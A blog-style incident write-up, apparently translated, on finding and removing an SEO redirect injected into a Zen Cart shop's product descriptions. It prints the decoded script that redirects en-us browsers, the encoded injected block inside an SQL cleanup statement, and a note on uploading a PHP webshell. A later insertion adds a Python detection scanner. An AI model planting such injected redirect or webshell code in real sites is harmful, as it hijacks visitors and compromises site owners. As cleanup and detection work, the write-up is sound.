Preface: Yesterday a friend asked me to fix a problem: the website automatically jumps to another website when it is opened in an English-language browser.
Background: In the Internet era, hackers and businesses coexist. Some people profit from intrusion techniques, and this has grown into a black-market industry chain. Some break in to plant Trojans and harvest bots; others use intrusions for SEO. Haha, all kinds of things. The problem we ran into today is related to SEO: someone else's website is used to take its visitors and send them to a specified website. The client's website is an English-language foreign-trade site that mainly sells goods to foreigners, and the website that visitors are redirected to is in the same industry. Haha! Some of you will get it: this is an SEO technique.
That is the background; now on to the problem.
Analyzing the symptom, "automatically jumps in an English browser", points to a problem in the website code and rules out domain name hijacking. The website runs Zen Cart. Let me say up front that I am not familiar with it! Still, I had some ideas for the analysis: start with the homepage and check whether it contains suspicious JS code. The key judgment is that the check on the browser's language is implemented in JS code.
I opened the homepage and viewed the source in the browser. First I searched for the keyword of the URL being jumped to; 7louisvuitton.com returned no result. Next, all I could do was read the code line by line, paying attention to the JS code. After half a day of reading the code from start to end, I had found nothing suspicious. This was looking a little difficult. I went to the admin back end and used the Zen Cart source code search function to search for the keyword. After running it, still no files were found.
At this point I got the FTP username and password and uploaded a PHP webshell, whose file search function can search all of the website's files for the keyword. It seems that this thing either lives in the database or has had its URL changed. I looked up the Zen Cart templates on Baidu and searched the key parts by hand, with no result.
Then I went to a product page on the website and looked at it carefully. At the comment <!--bof Product description --> I found a piece of encoded JS.
Something felt wrong, so I immediately ran it through a URL decoder.
Two pieces of code were found:

    <script language="javascript" src="http://count40.51yes.com/click.aspx?id=401446169&logo=6" charset="gb2312"></script>

This one is traffic statistics.

    <script language="JavaScript">
    <!--
    var la=navigator.browserLanguage.toLowerCase();
    if(la=='en-us') document.location = 'http://ii3v.com/b';
    // -->
    </script>

This is the key. If the browser language is en-us, it jumps... Haha, very sharp.
The URL it jumps to is the same website as the keyword.
The code sits right under the product description, so this should be a template issue. I went to find the template at once:
Templates\template_default\templates\tpl_document_product_info_display.php
The content is just a variable, <?php echo stripslashes($products_description); ?>. Frustrating. I have never worked with Zen Cart and did not know where the variable comes from. After searching for a long time without a clue, I had to go and check the database. Connecting to the database with the PHP webshell's backup function, I could see a table named products_description, so I backed it up and downloaded it immediately.
Restoring it to a local MySQL
Related commands:

    mysql -uroot -p123456
    create database aaa;
    use aaa;
    source d:1.sql;

After the restore, I could see that the code had been inserted in front of the product description in the table.
A batch replace restored everything to normal at once.
The code is as follows:

    UPDATE products_description SET products_description = REPLACE(products_description, '<div style="display:none"><script language="javascript" src="http://%63%6F%75%6E%74%34%30%2E%35%31%79%65%73%2E%63%6F%6D/click.aspx?id=401446169&logo=6" charset="gb2312"></script><!-- document.write(unescape("%3Cscript%20language%3D%22JavaScript%22%3E%20%0D%0A%3C%21--%20%0D%0Avar%20la%3Dnavigator.browserLanguage.toLowerCase%28%29%3B%0D%0Aif%28la%3D%3D%27en-us%27%29%20document.location%20%3D%20%27http%3A//%69%69%33%2E%76%6F%6D/B%63%3B%0D%0A//%20--%3E%20%0D%0A%3C/script%3E")); // --></script></div>', '');
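
To list which rows carry an injected block before running a batch replace like the one above, the following added example (not code from the original post) scans products_description values for a hidden div that holds only script elements, percent-decodes it until stable, and reports the URLs and any browser-language redirect it finds. The function names, sample rows and .example hosts are constructed for illustration.

```python
import re
from urllib.parse import unquote

# A display:none <div> that holds only <script> elements, as in the injected block.
SCRIPT = r'<script\b(?:(?!</script>).)*</script>'
HIDDEN_DIV = re.compile(
    r'<div\s+style\s*=\s*"display:\s*none"\s*>\s*(?:' + SCRIPT + r'\s*)+</div>',
    re.IGNORECASE | re.DOTALL)
URL = re.compile(r'https?://[^\s\'"<>;)]+', re.IGNORECASE)
# A browser-language test followed by a location change.
LANG_REDIRECT = re.compile(
    r'navigator\.(?:browserLanguage|userLanguage|language).*?location', re.I | re.S)

def fully_decode(text, max_rounds=5):
    """Percent-decode until stable so unescape("%3Cscript...") payloads are readable."""
    for _ in range(max_rounds):
        text, previous = unquote(text), text
        if text == previous:
            break
    return text

def scan_description(html):
    """Return (findings, cleaned_html) for one products_description value."""
    findings = []
    for block in HIDDEN_DIV.finditer(html):
        decoded = fully_decode(block.group(0))
        findings.append({"urls": sorted(set(URL.findall(decoded))),
                         "language_redirect": bool(LANG_REDIRECT.search(decoded))})
    return findings, HIDDEN_DIV.sub("", html)

def scan_rows(rows):
    """Map products_id -> findings for every row that carries a hidden script block."""
    scanned = ((pid, scan_description(html)[0]) for pid, html in rows)
    return {pid: found for pid, found in scanned if found}

# Constructed sample rows (reserved .example hosts), shaped like the block found above.
SAMPLE_ROWS = [
    (1, '<p>Leather bag</p>'),
    (2, '<div style="display:none">'
        '<script src="http://%63ounter.example/click.aspx?id=0"></script>'
        '<script><!-- document.write(unescape("%3Cscript%3Evar%20la%3Dnavigator.'
        'browserLanguage.toLowerCase%28%29%3Bif%28la%3D%3D%27en-us%27%29%20document.'
        'location%3D%27http%3A//redirect.example/b%27%3B%3C/script%3E")); // --></script>'
        '</div><p>Canvas wallet</p>'),
]

if __name__ == "__main__":
    for pid, found in scan_rows(SAMPLE_ROWS).items():
        print(pid, found)
```

Treat the cleaned value as a preview and compare it with the backup before updating the table.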
The remaining task is to find the PHP Trojan and backdoor and upgrade Zen Cart to the latest version.
The job is now done. This is a sharp SEO attack technique.
Author: passthrough